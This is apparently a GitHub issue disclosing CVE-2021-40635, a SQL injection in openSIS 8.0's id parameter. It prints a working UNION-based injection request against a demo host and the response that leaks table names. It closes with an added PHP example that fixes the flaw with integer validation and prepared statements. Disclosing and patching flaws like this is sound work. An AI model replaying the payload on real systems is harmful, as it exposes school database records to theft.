Headline
CVE-2021-40635: SQL Injection in id Parameter · Issue #195 · OS4ED/openSIS-Classic
OS4ED openSIS 8.0 is affected by SQL injection in ChooseCpSearch.php and ChooseRequestSearch.php. An attacker can inject a SQL query to extract information from the database.
Because no security mechanism was implemented for the id parameter, an attacker can inject an arbitrary SQL query and extract database information.

Vulnerable code section
ChooseCpSearch.php
ChooseRequestSearch.php

Request and Response
GET /ChooseRequestSearch.php?id=1'+union+select+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=database()--+-&table_name=courses HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1

HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 15:34:05 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1194
Connection: close
Content-Type: text/html

course_modal_request||3 courses were found.
Course
Reading
Writing
api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade
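
One way to handle the id parameter safely, as an added example that is not openSIS code or the project's actual fix: the value is validated as a positive integer and then bound to a prepared statement instead of being concatenated into the query. The function name, the column names (course_id, subject_id, title), the sample rows and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
// Added example, not openSIS code. Column names (course_id, subject_id,
// title), the function name and the sample rows are assumptions.

function courses_for_subject(PDO $db, $rawId): array
{
    // Allow-list the type: id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    // Bind the value; it is sent as data and cannot alter the statement.
    $stmt = $db->prepare('SELECT course_id, title FROM courses WHERE subject_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory database so the example runs offline; in the
// application this would be the existing MySQL connection.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE courses (course_id INTEGER, subject_id INTEGER, title TEXT)');
$db->exec("INSERT INTO courses VALUES (1, 1, 'Reading'), (2, 1, 'Writing'), (3, 2, 'Algebra')");

// Constructed inputs: a normal id, then values that are not plain integers.
$inputs = ['1', "1' union select 1,2,3-- -", '1 OR 1=1', ['1'], null];
foreach ($inputs as $raw) {
    try {
        $titles = array_column(courses_for_subject($db, $raw), 'title');
        echo json_encode($raw), ' => ', implode(', ', $titles), "\n";
    } catch (InvalidArgumentException $e) {
        // In the application: respond 400 and log the rejected value for detection.
        echo json_encode($raw), " => rejected\n";
    }
}
```

Either control alone would stop the request shown above; using both means a later change that loosens the validation still cannot turn the parameter into SQL text.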